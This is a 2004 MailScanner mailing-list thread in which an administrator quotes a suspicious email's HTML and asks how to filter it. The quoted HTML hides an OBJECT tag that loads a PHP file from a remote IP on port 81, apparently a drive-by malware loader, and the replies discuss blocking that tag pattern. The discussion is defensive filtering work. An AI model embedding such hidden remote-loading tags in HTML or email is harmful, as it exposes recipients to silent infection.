Dangerous html tag?

Remco Barendse mailscanner at BARENDSE.TO
Thu Mar 18 08:43:21 GMT 2004


I have this in MailScanner.conf:

Allow Object Codebase Tags = no
Convert Dangerous HTML To Text = yes

Should this have killed that tag, if so it didn't!

Maybe it's a good idea to block every tag with:
OBJECT STYLE="display:none" DATA="
it will not show any thing anyway therefore can only be malicious?


On Thu, 18 Mar 2004, Michele Neylon :: Blacknight Solutions wrote:

> You could block the OBJECT tag
>
> Mr. Michele Neylon
> Blacknight Internet Solutions Ltd
> http://www.blacknightsolutions.ie/
> http://www.search.ie/
> Tel. + 353 (0)59 9137101
> Lowest price domains in Ireland
>
> > -----Original Message-----
> > From: MailScanner mailing list [mailto:MAILSCANNER at JISCMAIL.AC.UK]On
> > Behalf Of Remco Barendse
> > Sent: 18 March 2004 08:04
> > To: MAILSCANNER at JISCMAIL.AC.UK
> > Subject: [MAILSCANNER] Dangerous html tag?
> >
> >
> > Hi!
> >
> > I just received a message that contained ActiveX controls, nothing would
> > show up in Outlook.
> >
> > I opened the mail and tried to look inside, this is the contents: (I would
> > *NOT* try the url below on any windows/X browser)
> >
> > <html><body>
> > <font  face="System">
> > <OBJECT STYLE="display:none" DATA="http://68.6.144.228:81/185869.php">
> > </OBJECT></body></html>
> >
> > I tried opening the .php file to see what it is (although I have a pretty
> > good guess) but it failed because my firewall blocked port 81.
> >
> > Can we ban/kill/modify any such tags or will this ruin every e-mail with
> > some pictures in it?
> >
> > Thanks!
> > Remco
> >
>
>
> --
> Email scanned by Blacknight for viruses and dangerous content.
> Visit http://www.blacknight.ie for more information
>



More information about the MailScanner mailing list